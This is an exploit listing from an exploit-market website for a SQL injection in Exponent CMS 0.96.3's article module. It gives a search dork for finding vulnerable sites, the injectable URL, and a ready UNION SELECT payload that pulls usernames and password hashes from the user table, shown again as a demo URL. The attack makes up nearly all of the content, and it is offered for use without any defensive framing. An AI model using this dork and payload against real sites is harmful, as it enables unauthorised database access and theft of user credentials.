[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability

Author
T u R c O
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10783
Category
web applications
Date add
07-02-2010
Platform
unsorted
===============================================================
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability
===============================================================

# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site"  inurl:articlemodule
               
   
####################################################################
   
===[ Exploit ]===
   
http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
   
  -1+union+select+1,2,3,password,username,6+from+exponent_user--
 
Demo:
 
http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--
 


#  0day.today [2024-12-25]  #